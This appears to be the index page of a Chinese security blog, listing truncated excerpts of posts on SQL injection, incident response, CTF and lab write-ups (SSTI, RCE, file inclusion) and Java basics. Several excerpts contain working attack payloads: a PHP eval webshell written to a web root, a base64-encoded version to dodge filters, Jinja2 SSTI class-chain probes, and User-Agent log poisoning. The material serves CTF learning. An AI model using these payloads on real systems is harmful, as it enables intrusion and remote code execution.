深入浅出sql注入
0x01sql注入前置讲这个知识之前我们得先问自己三个问题 什么是数据库?简单来说,数据库就是“数据”的“仓库”。数据库是一个组织化的数据集合,用于存储、管理和检索信息。它为存储数据提供了一种格式化的方式,并允许用户和应用程序有效地查询、更新和管理这些数据。数据库中包含表、关系以及操作对象,数据存储在表中。 什么是sql?SQL是结构化查询语言,是一种用于与关系数据库进行交互的标准编程语言。它用于定义、操作和控制数据,以及管理数据库。SQL 是一种高度通用的语言,几乎所有的数据库管理系统(RDBMS)都支持SQL,包括MySQL、PostgreSQL、Microsoft SQL Server 和 Oracle 等。 sql里有四大最常见的操作,即增删查改: 增。增加数据。其简单结构为: INSERT table_name(columns_name) VALUES(new_values)。 删。删除数据。其简单结构为: DELETE table_name WHERE condition。 查。查找数据。其简单结构为:SELECT columns_name FROM...
应急响应日志分析汇总(持续更新)
0x01前言应急响应的话我认为是每一个学信安的人需要去学习的,所以我也是对此进行了响应的学习和积累,希望在以后发生真实的事件时能第一时间进行良好的反馈 借鉴师傅的文章:(这里的话还是有点多的,毕竟这个话题的分区还是蛮多的) https://bypass007.github.io/Emergency-Response-Notes/Summary/%E7%AC%AC1%E7%AF%87%EF%BC%9AWindow%E5%85%A5%E4%BE%B5%E6%8E%92%E6%9F%A5.html windows入侵排查:https://www.freebuf.com/articles/network/286270.html windows分析事件日志:https://zone.huoxian.cn/d/868-windows 常见Windows事件ID状态码:https://www.cnblogs.com/chddt/p/13262385.html 0x02应急响应在学习应急响应之前,我们首先要先了解什么是应急响应 什么是应急响应?应急响应(Incident Response...
春秋云镜初试
第一个flag 用fscan扫一下发现是thinkphp的rce 访问一下网址 扫目录 访问出来还是index.php 直接看漏洞浮现就可以 抓包上传 id可以看到当前的用户信息,然后我们用pwd看一下当前目录 放蚁剑打好一点,往里面写个一句话 1echo "<?php @eval($_POST['cmd']);?>" > /var/www/html 然后ls看一下木马是否成功写入 看到写入了,用蚁剑连一下 但是没连上,是被吃了吗??? 穿个phpifo的php文件试一下 1echo "<?php phpinfo();?>" > /var/www/html/test2.php 然后访问test2.php是可以出来的 应该是有什么被过滤了,我们用base64编码传进去试一下 1echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d >...
web入门SSTI篇-ctfshow
web361#jinja2的ssti 既然知道了漏洞是什么,那首先就是要去找到注入点 但是在页面源代码和抓包里也没找到什么,扫目录也啥都没有 根据hello猜测参数可能是name或者id,测试后发现是name参数 测一下ssti漏洞 传入100出现100,初步判断存在ssti注入漏洞,接下来就是去拿类然后进行注入了 12345678第一步,拿到当前类,也就是用__class__{{"".__class__}}<class 'str'>第二步,拿到基类,这里可以用__base__,也可以用__mro__{{"".__class__.__base__}}<class...
RCE之无回显rce
0x01前言刚好做到一个湘岚杯的题目是跟无回显rce有关的,就写篇文章去深入学习一下这个知识点 在我们做题的时候或者是测试的时候,通常会有命令执行后没有回显的情况,页面不会返回我们执行的结果,而我们也不知道命令是否执行成功,这时候就是讲到我们的无回显RCE了 0x02正文没有回显加上命令执行的话很容易就能想到反弹shell,这也是其中的一个方法之一 反弹shell参考文章...
湘岚杯XL::CTF浮现web
0x01前言没报名,但是后面发现这个比赛的赛题挺好玩的,就浮现玩一下 0x02赛题大道轮回12345678910111213141516171819202122232425262728293031323334<?phpsession_start();/*跳出轮回的真谛开头是:XNCTF*/show_source(__FILE__);error_reporting(0);if (isset($_GET['sha256']) && isset($_GET['cmd'])) { $sha256 = $_GET['sha256']; $cmd = $_GET['cmd']; if (substr(sha256($sha256), 0, 6) === '647d99') { echo "踏平坎坷成大道,斗罢艰险又出发"; if...
春秋杯
只看了一道题,后面比赛结束了没得浮现环境了做不了了,所以只写了一道题的wp easy_flask 那两个链接没什么用,登录进去后对着url中user参数进行ssti注入就可以 这样就可以看出是存在ssti了 12345678第一步,拿到当前类,也就是用__class__{{"".__class__}}<class 'str'>第二步,拿到基类,这里可以用__base__,也可以用__mro__{{"".__class__.__base__}}<class...
java从0到1的学习
基础知识一个 Java 程序可以认为是一系列对象的集合,而这些对象通过调用彼此的方法来协同工作。 对象和类 对象:对象是类的一个实例,有状态和行为。 类:类是一个模板,它描述一类对象的行为和状态。 方法:方法就是行为,一个类可以有很多方法。逻辑运算、数据修改以及所有动作都是在方法中完成的。 实例变量:每个对象都有独特的实例变量,对象的状态由这些实例变量的值决定。 比如,我们类可以看成是一类动物,行为和状态就指的是动物的一些特点,而对象就可以具体到哪些动物,拿一条狗来举例,它的状态有:名字、品种、颜色,行为有:叫、摇尾巴和跑。这些行为和状态就是可以看成是一个个实例变量和方法,而具体的名字等等就是变量的值,具体的行为就是方法了。在java中状态可以看成是成员属性(变量),而行为就是成员方法 因为之前学过php,所以对这些的理解的话其实大致上是一样的。 程序员的第一个程序必然就是hello world了,那我们先拿这个代码来分析一下 12345678public class HelloWorld { /* 我的第一个Java程序 * 它将输出字符串...
极客大挑战2020wp--web
web-Welcome 打开是405错误,抓包后看到是Method Not Allowed 搜索后发现是请求方式错误,换成POST传参就可以拿到源码了 1234567891011121314<?phperror_reporting(0);if ($_SERVER['REQUEST_METHOD'] !== 'POST') {header("HTTP/1.1 405 Method Not Allowed");exit();} else { if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){ show_source(__FILE__); } else if ($_POST['roam1'] !== $_POST['roam2'] &&...
ctfshowAK赛
签到_观己123456789101112131415<?phpif(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file); }}else{ highlight_file(__FILE__);}?> include文件包含,我们用日志注入,先看一下服务器版本 对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log,访问后在UA头传入一句话木马,然后用蚁剑连马就可以了 web2_观星打开题目很像是之前的一道sql注入的题目